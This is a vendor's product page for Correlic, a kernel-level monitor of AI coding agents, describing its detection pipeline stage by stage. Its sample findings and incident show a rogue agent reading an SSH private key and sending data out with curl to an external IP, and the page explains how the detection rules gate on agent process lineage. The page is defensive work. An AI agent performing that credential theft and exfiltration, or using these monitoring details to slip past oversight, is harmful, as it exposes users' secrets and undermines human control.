Architecture Deep Dive

What Happens When Your
AI Agent Goes Rogue

See how Correlic monitors AI agent activity from the kernel up — capturing every process, file access, and network connection, then surfacing threats with autonomous AI investigation.

100% on-prem — no data ever leaves your infrastructure
Scroll to explore
The Journey

How AI Agent Activity Is Monitored

Scroll through each stage to see how Correlic captures, analyzes, and responds to everything your AI agents do.

Stage 1 / 11
Linux
eBPF TracepointsKprobesRing Buffers
Windows
ETW ProvidersSecurity AuditUSN Journal
macOS
kqueueFSEventslsof Polling
Stage 1

Where It All Starts

Kernel Collection

When an AI agent like Cursor, Claude Code, or Copilot performs any action on your system, Correlic captures it directly at the kernel level — before the agent even knows it's being watched.

Stage 2 / 11
Session: sess-a1b2c3d4
cursor
AI Agent
python3
Tool
node
Tool
curl
Shell
git
Shell
npm
Shell
AI Agent
Tool
Shell
Stage 2

Knowing Which Agent Did What

Session & PID Tracking

Every AI agent process is assigned a unique session UUID that automatically inherits from parent to child — building a complete lineage tree so Correlic knows exactly which agent spawned which process.

Stage 3 / 11
Security-First Order
AI Agent EventsBYPASS
Suspicious PatternsKEEP
Benign System ActivityDROP
Remaining EventsSAMPLE
~90% volume reduction · Zero AI blind spots
Stage 3

Keep What Matters, Drop What Doesn't

Intelligent Sampling

Not every event is worth storing. Correlic's security-first sampling pipeline ensures AI agent activity is never filtered, suspicious patterns are always kept, and routine noise is intelligently removed.

Stage 4 / 11
PostgreSQL
Events & findings
Baselines & incidents
AI context windows
Alert delivery queue
Neo4j
Agent process trees
Parent-child edges
AI session propagation
Attack chain traversal
Graph Write Strategy
Instant — Process Events
Process tree edges written to Neo4j immediately so detection always has an up-to-date graph
Batched — File, Network, DNS
Buffered and flushed periodically for efficiency without sacrificing graph completeness
Stage 4

The Heart of Correlic

Correlation Engine

This is what Correlic is named for — correlation at the core. Every event is mapped by agent session and process ID, building a live relationship graph that connects everything an AI agent touches.

Stage 5 / 11
AI Process Gate
Only agent-descended processes trigger rules
ACTIVE
Live Detection Feed
python3 → /root/.ssh/id_rsa
Credential Access
CRITICAL
curl → 203.0.113.42:443
Network Anomaly
HIGH
agent → chmod 777 deploy.sh
Code Tampering
MEDIUM
Full MITRE ATT&CK coverage · Continuously expanding
Stage 5

Purpose-Built for AI Agent Threats

Threat Detection

Every detection rule gates on AI process attribution first — system daemons and human activity never trigger false positives. Rules are designed for the specific ways AI agents go rogue.

Stage 6 / 11
Baseline Controls
Manual Baseline
24 hours7 days30 daysPermanent
Auto-Learning
Strict safety rules · Manual baseline recommended for faster accuracy
Always Protected
Credentials, privileged files, attack infrastructure — never suppressed
Every decision trains the system · Noise decreases over time
Stage 6

Learning What's Normal

Behavioral Engine

Correlic continuously observes what your AI agents normally do and learns to suppress expected behavior — while ensuring that access to sensitive resources always generates a finding.

Stage 7 / 11
ai.credential_access
MITRE ATT&CK mapped · Confidence 0.92
Critical
ai.unexpected_network
MITRE ATT&CK mapped · Confidence 0.92
High
ai.code_tampering
MITRE ATT&CK mapped · Confidence 0.92
Medium
AllowDismissInvestigate
Stage 7

Every Detection, Actionable

Findings & Triage

Each threat detection generates a structured finding with severity, confidence, context, and MITRE technique mapping. Users can allow, dismiss, or investigate each finding — and their decisions feed back into the behavioral engine.

Stage 8 / 11
Chain: Full Compromise
credential_accessT+0s
unauthorized_execT+45s
data_exfiltrationT+3m
CRITICALSeverity amplified · Cooldown bypassed
Stage 8

Connecting the Dots

Chain Correlation

A single finding is a data point. A chain of findings is evidence. Correlic links individual detections into multi-step attack sequences — because AI agents can perform complex attack patterns faster than any human.

Stage 9 / 11
INC-0041CRITICAL
OPEN
cursor session · 2 processes · chain detected
14:32:01CRITICAL
credential_access
python3 → .ssh/id_rsa
14:32:18HIGH
unauthorized_exec
curl spawned by agent
14:32:44CRITICAL
data_exfiltration
curl → 203.0.113.42:443
openinvestigatingresolveddismissed
Stage 9

From Findings to Action

Incident Engine

Findings are grouped by host and agent session into coherent incidents with full lifecycle management. Each incident gets a structured dossier — the foundation for AI-powered investigation.

Stage 10 / 11
Context Window Hierarchy
1 mincontext
1 hourcontext
1 daycontext
1 weekcontext
1 monthcontext
1 yearcontext
APT Detection
Threats invisible at 1-minute scale become obvious at weekly or monthly granularity. Broader windows catch slow, persistent attacks.
"What was this agent doing last Tuesday?"
Stage 10

Evidence-Based, Never Assumed

AI Analysis

Correlic builds detailed context windows at every time scale — from 1-minute snapshots to yearly summaries. Raw events are periodically cleaned without affecting analysis, because the context windows preserve full intelligence. This is what makes Correlic capable of detecting long-term threats that other tools miss.

Stage 11 / 11
Live Alert Feed
INC-0041 · credential_access
cursor session · just now
CRITICAL
#security-alerts
Incident escalated to CRITICAL · 3 findings
Sent
POST → siem.internal/webhook
HMAC-SHA256 signed · 200 OK
LOWMEDIUMHIGHCRITICALgate: HIGH+
Stage 11

The Right Alert, to the Right Place

Alerts & Response

Every finding generates an in-app notification for full audit trail. Incidents are delivered externally via Slack or webhook — severity-gated and cryptographically signed.

KernelSessionIntelligentCorrelationThreatBehavioralFindingsChainIncidentAIAlerts

End-to-end latency under 100ms from kernel event to stored finding